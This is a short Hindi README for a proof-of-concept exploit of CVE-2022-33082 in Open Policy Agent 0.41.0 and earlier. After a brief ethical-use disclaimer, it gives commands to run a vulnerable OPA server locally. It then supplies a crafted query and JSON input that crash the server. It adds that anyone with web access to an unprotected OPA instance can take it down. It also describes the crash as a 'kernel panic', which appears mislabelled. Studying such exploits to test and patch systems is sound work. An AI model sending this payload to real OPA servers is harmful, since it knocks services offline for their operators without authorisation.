CVE 2022-33082 एक्सप्लॉइट
अस्वीकरण
यह कोड नैतिक उद्देश्यों के लिए प्रदान किया गया है - भेद्यता को समझने और अपने स्वयं के सिस्टम या अधिकृत सिस्टम का परीक्षण करने के लिए। इसका उपयोग करके, आप नैतिक रूप से कार्य करने के लिए सहमत होते हैं और यदि आप नैतिक रूप से कार्य नहीं करते हैं तो मेरी कोई जिम्मेदारी नहीं होगी।
यह एक्सप्लॉइट Open Policy Agent (OPA) संस्करण 0.41.0 और उससे निचले संस्करणों पर काम करता है। Linux पर OPA इंस्टेंस स्थापित करके इस कमांड से परीक्षण करें:
curl -L -o opa https://openpolicyagent.org/downloads/v0.41.0/opa_linux_amd64_static
chmod +x opa
./opa run --server
फिर, अपने वेब ब्राउज़र में localhost:8181 पर जाएं। नीचे दिए गए संबंधित फ़ील्ड्स में इनपुट करें
क्वेरी फ़ील्ड (go कोड):
p := [input() | input := 1]
{ "input":"put this in the input (json) field!" }
उसके बाद वेबसाइट क्रैश हो जाएगी और सर्वर चला रहा टर्मिनल कर्नल पैनिक (kernel panic) रिपोर्ट करेगा।
निहितार्थ
OPA सर्वर संस्करण 0.41.0 या उससे निचले संस्करण तक वेब पहुंच रखने वाला कोई भी व्यक्ति सर्वर को पूरी तरह से क्रैश कर सकता है। यह सर्वर डिफ़ॉल्ट रूप से पासवर्ड सुरक्षित नहीं है।